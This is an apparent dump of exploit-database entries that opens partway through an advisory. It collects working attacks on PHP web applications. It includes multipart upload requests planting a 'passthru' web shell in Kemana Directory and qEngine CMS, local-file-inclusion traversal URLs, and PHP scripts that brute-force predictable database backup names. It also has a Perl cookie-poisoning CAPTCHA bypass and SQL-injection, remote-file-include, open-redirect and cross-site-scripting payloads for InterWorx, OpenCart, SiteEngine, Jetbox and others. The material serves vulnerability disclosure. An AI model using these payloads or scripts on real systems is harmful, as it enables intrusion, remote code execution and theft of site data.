-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"
-----------------------------225222869427624--
Upload location: http://localhost/kemana/public/image/
Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
#3 (Tools > File Manager > Upload)
POST http://localhost/kemana/admin/fman/upload_process.php HTTP/1.1
-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"
-----------------------------76802486520945
Content-Disposition: form-data; name="n"
5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945--
Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/kemana/shell.php?cmd=whoami
#4 (Contents > Slideshow > Add Entry)
POST http://localhost/kemana/admin/featured_content.php? HTTP/1.1
-----------------------------9813040432632
Content-Disposition: form-data; name="AXSRF_token"
516e6705d27d7d242d948d16b18a6339
-----------------------------9813040432632
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------9813040432632
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------9813040432632
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------9813040432632
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_title"
Zero Science Lab
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_img"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_url"
http://www.zeroscience.mk
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_text"
<p>TEST</p>
-----------------------------9813040432632--
Upload location: http://localhost/kemana/public/image/
Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami

47
platforms/php/webapps/32508.txt Executable file
View file

@ -0,0 +1,47 @@
?
Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'run' parameter to task.php is
not properly verified before being used to include files. This can
be exploited to include files from local resources with directory
traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5177
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini

177
platforms/php/webapps/32509.txt Executable file
View file

@ -0,0 +1,177 @@
<?php
/*
Kemana Directory 1.5.6 Database Backup Disclosure Exploit
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as '_Full Backup YYYYMMDD_1.sql' or '_Full Backup YYYYMMDD_1.gz',
which can be exploited to disclose sensitive information by
downloading the file. The '/admin/backup' is also vulnerable to
directory listing by default.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5176
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5176.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
*/
error_reporting(0);
function status($done, $total, $size=20)
{
static $start_time;
if($done > $total) return;
if(empty($start_time)) $start_time=time();
$now = time();
$perc=(double)($done/$total);
$bar=floor($perc*$size);
$disp=number_format($perc*100, 0);
$status_bar="\r $disp% [";
$status_bar.=str_repeat("=", $bar);
if($bar<$size)
{
$status_bar.=">";
$status_bar.=str_repeat(" ", $size-$bar);
} else
{
$status_bar.="=";
}
$status_bar.="] $done/$total";
$rate = ($now-$start_time)/$done;
$left = $total - $done;
$eta = round($rate * $left, 2);
$elapsed = $now - $start_time;
$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
echo "$status_bar ";
flush();
if($done == $total)
{
echo "\n";
}
}
print "
@---------------------------------------------------------------@
| |
| Kemana Directory 1.5.6 Database Backup Disclosure Exploit |
| |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
| Advisory ID: ZSL-2014-5176 |
| www.zeroscience.mk |
| |
@---------------------------------------------------------------@
";
if ($argc < 4)
{
print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
die();
}
$godina_array = array('2014','2013','2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";
$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";
echo "\n [*] Running checks:\n\n";
foreach($godina_array as $godina)
{
foreach($mesec_array as $mesec)
{
$x++;
status($x, 58);
foreach($dn_array as $dn)
{
$ext=".gz";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: '_Full Backup ".$godina.$mesec.$dn."_1".$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext."\n\n");
}
$ext=".sql";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: '_Full Backup ".$godina.$mesec.$dn."_1".$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext."\n\n");
}
}
}
}
print "\n\n [*] Zero findings!\n\n\n";
?>

103
platforms/php/webapps/32510.txt Executable file
View file

@ -0,0 +1,103 @@
?#!C:\Perl64\bin\perl.exe
#
# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit
#
#
# Vendor: C97net
# Product web page: http://www.c97.net
# Affected version: 1.5.6
#
# Summary: Experience the ultimate directory script solution with Kemana.
# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features
# including: CMS engine based on our qEngine, multiple directories support,
# user friendly administration control panel, easy to use custom fields,
# unsurpassed flexibility.
#
# Desc: The CAPTCHA function for Kemana Directory is prone to a security
# bypass vulnerability that occurs in the CAPTCHA authentication routine.
# The function 'qvc_init()' in '/includes/function.php' sets a cookie with
# a SHA1-based hash value in the Response Header which can be replaced by
# a random SHA1 computed hash value using Cookie Poisoning attack. Successful
# exploit will allow attackers to bypass the CAPTCHA-based authentication
# challenge and perform brute-force attacks.
#
#
# =============================================================================
# /includes/function.php:
# -----------------------
#
# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */
# 1775:
# 1776:
# 1777: // qVC - the simplest visual confirmation engine yet
# 1778: // use qvc_init() --> <img src="visual.php"> --> compare qvc_value() == sha1 (strtolower($user_input) )?
# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!
# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F
# 1781: function qvc_init ($num = 5)
# 1782: {
# 1783: if ($num == 3)
# 1784: $value = mt_rand (100, 999);
# 1785: else
# 1786: $value = random_str (5);
# 1787: ip_config_update ('visual', $value);
# 1788: setcookie ('qvc_value', sha1 ($value), 0, '/');
# 1789: }
# 1790:
# 1791:
# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)
# 1793: function qvc_value ()
# 1794: {
# 1795: $correct_val = cookie_param ('qvc_value');
# 1796:
# 1797: // block browser BACK
# 1798: qvc_init ();
# 1799: return $correct_val;
# 1800: }
# =============================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Apache/2.4.7 (Win32)
# PHP/5.5.6
# MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2014-5175
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php
#
#
# Dork #1: intitle:powered by c97.net
# Dork #2: intitle:powered by qEngine
# Dork #3: intitle:powered by Kemana.c97.net
# Dork #4: intitle:powered by Cart2.c97.net
#
#
# 08.03.2014
#
use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03
$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass=
"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar);
print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_
print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1
print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].
=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";
"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";
$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string
;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$
juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get;
"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\
info(){print"
+-----------------------------------------------------+
| |
| Kemana Directory CAPTCHA Bypass PoC Exploit |
| |
| ID: ZSL-2014-5175 |
| |
+-----------------------------------------------------+
\n\n";}

514
platforms/php/webapps/32511.txt Executable file
View file

@ -0,0 +1,514 @@
<?php
/*
qEngine CMS 6.0.0 Database Backup Disclosure Exploit
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6
Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.
Desc: qEngine CMS stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as 'Full Backup YYYYMMDD.sql' or 'Full Backup YYYYMMDD.gz', which
can be exploited to disclose sensitive information by downloading
the file. The '/admin/backup' is also vulnerable to directory listing
by default.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5172
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5172.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
*/
error_reporting(0);
function status($done, $total, $size=20)
{
static $start_time;
if($done > $total) return;
if(empty($start_time)) $start_time=time();
$now = time();
$perc=(double)($done/$total);
$bar=floor($perc*$size);
$disp=number_format($perc*100, 0);
$status_bar="\r $disp% [";
$status_bar.=str_repeat("=", $bar);
if($bar<$size)
{
$status_bar.=">";
$status_bar.=str_repeat(" ", $size-$bar);
} else
{
$status_bar.="=";
}
$status_bar.="] $done/$total";
$rate = ($now-$start_time)/$done;
$left = $total - $done;
$eta = round($rate * $left, 2);
$elapsed = $now - $start_time;
$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
echo "$status_bar ";
flush();
if($done == $total)
{
echo "\n";
}
}
print "
@---------------------------------------------------------------@
| |
| qEngine CMS 6.0.0 Database Backup Disclosure Exploit |
| |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
| Advisory ID: ZSL-2014-5172 |
| www.zeroscience.mk |
| |
@---------------------------------------------------------------@
";
if ($argc < 4)
{
print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
die();
}
$godina_array = array('2014','2013','2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";
$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";
echo "\n [*] Running checks:\n\n";
foreach($godina_array as $godina)
{
foreach($mesec_array as $mesec)
{
$x++;
status($x, 58);
foreach($dn_array as $dn)
{
$ext=".gz";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
$ext=".sql";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
}
}
}
print "\n\n [*] Zero findings!\n\n\n";
?>
#######################################################################################
qEngine CMS 6.0.0 (task.php) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6
Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.
Desc: qEngine CMS suffers from an authenticated file inclusion
vulnerability (LFI) when input passed thru the 'run' parameter to
task.php is not properly verified before being used to include files.
This can be exploited to include files from local resources with
directory traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5173
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5173.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/qe6_0/admin/task.php?run=../../../../../../windows/win.ini
#########################################################################?
qEngine CMS 6.0.0 Remote Code Execution
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6
Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.
Desc: qEngine CMS suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:
User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)
Only the 'Super Admin' level makes the Tool 'File Manager' available.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5174
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5174.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
#1 (Modules > qBanner > Manage Banner > Add Entry)
POST http://localhost/qe6/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"
QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"
This page is part of qBanner module. Please use qBanner Manager to edit this page.
-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"
-----------------------------225222869427624--
Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami
#2 (Tools > File Manager > Upload)
POST http://localhost/qe6/admin/fman/upload_process.php HTTP/1.1
-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"
-----------------------------76802486520945
Content-Disposition: form-data; name="n"
5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945--
Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/qe6/shell.php?cmd=whoami
#3 (Modules > Slideshow > Manage Slides > Add Entry)
POST http://localhost/qe6/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1
-----------------------------23201806221528
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------23201806221528
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------23201806221528
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------23201806221528
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------23201806221528
Content-Disposition: form-data; name="group_id"
SSHOW
-----------------------------23201806221528
Content-Disposition: form-data; name="page_body"
This page is part of SlideShow module. Please use SlideShow Manager to edit this page.
-----------------------------23201806221528
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------23201806221528
Content-Disposition: form-data; name="page_list"
-----------------------------23201806221528--
Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami
#4 (Contents > Manage Categories > Add Entry)
POST http://localhost/qe6/admin/page_cat.php? HTTP/1.1
-----------------------------205172563220150
Content-Disposition: form-data; name="AXSRF_token"
3afa0c7483889ac54d7b6afa4083a9a2
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------205172563220150
Content-Disposition: form-data; name="group_id"
GENPG
-----------------------------205172563220150
Content-Disposition: form-data; name="parent_id"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------205172563220150
Content-Disposition: form-data; name="permalink"
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_details"
<p>Zero Science Lab</p>
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------205172563220150--
Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami

72
platforms/php/webapps/32516.txt Executable file
View file

@ -0,0 +1,72 @@
=================================================
Title: SQL injection in InterWorx Control Panel
Product: InterWorx Web Control Panel
Vendor: InterWorx LLC
Tested Version: 5.0.13 build 574
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-2531
Solution Status: Fixed in Version 5.0.14 build 577
Discovered and Provided: Eric Flokstra
=================================================
About the Vendor:
-------------------------
The InterWorx Hosting Control Panel is a web hosting and linux server
management system that provides tools for server administrators to
command their servers and for end users to oversee the operations of
their website.
Advisory Details:
-----------------------
SQL injection vulnerability in the InterWorx Web Control Panel.
The InterWorx application stores its data in a MySQL-database. For
interaction with the database dynamic queries are used. These queries
are created by concatenating strings from the application with user
input. However, the application does not perform proper validation or
escaping of the supplied input in the 'i' parameter when sorting user
accounts in NodeWorx, Siteworx and Resellers. Malicious users with
access to this functionality can manipulate database queries to
achieve other goals than the developers had in mind.
The following requests can be used as proof of concept and demonstrate
that user input is concatenated into a database query without proper
validation or escaping. The payload in the first request checks
whether the letter 'm' is the first letter of the database version.
Since the database in use is MySQL this condition is true and the
table is sorted by column 'nu.email'. If the condition is false
(request 2/letter t) the table is sorted by column 'nu.nickname'.
Request 1:
---------------
POST /xhr.php HTTP/1.1
Host: some.host.com:1234
".."
i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='m')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}
Request 2:
---------------
POST /xhr.php HTTP/1.1
Host: some.host.com:1234
".."
i={"r":"Controller","i":{"pgn8state":{"l":20,"o":0,"or":"(CASE+WHEN+(substring(@@version,1,1)='t')+THEN+nu.email+ELSE+nu.nickname+END)","d":"asc"},"refresh_on":[["addCommit",null],["editCommit",null],["deleteCommit",null],["activateCommit",null],["deactivateCommit",null]],"iw_refresh_action":"listUsers","iw_refresh_ctrl":"Ctrl_Nodeworx_Users","security_token":"-eNSV4z4pdYomP3pg8LrVSwRtHYE","c":"index","a":"livePayloadCommit","iw_sess_hint":"nodeworx","iw_payload_output":"html","where_was_i":"/nodeworx/users"}}
Vendor contact timeline:
---------------------------------
21 Feb 2014: Vendor notification
21 Feb 2014: Vulnerability confirmation
17 Mar 2014: Issue patched
25 Mar 2014: Public disclosure
Solution:
------------
Upgrade to the latest version (5.0.14 build 577) of InterWorx Web Control Panel.
References:
-----------------
[1] InterWorx Beta Channel -
http://forums.interworx.com/threads/8000-InterWorx-Version-5-0-14-Released-on-Beta-Channel!
[2] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org

50
platforms/php/webapps/32520.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title : OpenCart <= 1.5.6.1 SQL Injection
# Date : 2014/3/26
# Exploit Author : Saadat Ullah ? saadi_linux@rocketmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Author HomePage : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3
#Opencart suffers from multipe SQL injection in ebay.php the bug is more about
privilege escalation as attacker may need openbay module access .
Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.
public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);
$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More
public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");
In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'
#Independent Pakistani Security Researcher

10
platforms/php/webapps/32521.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/31883/info
Osprey is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
Osprey 1.0a4.1 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell]
http://www.example.com/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell]

9
platforms/php/webapps/32523.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31888/info
SiteEngine is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
A successful exploit may aid in phishing-style attacks.
SiteEngine 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/api.php?action=logout&forward=http://www.example2.com

9
platforms/php/webapps/32524.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31889/info
SiteEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SiteEngine 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*

9
platforms/php/webapps/32525.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31890/info
Jetbox CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Jetbox CMS 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E

9
platforms/php/webapps/32526.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/31898/info
ClipShare Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
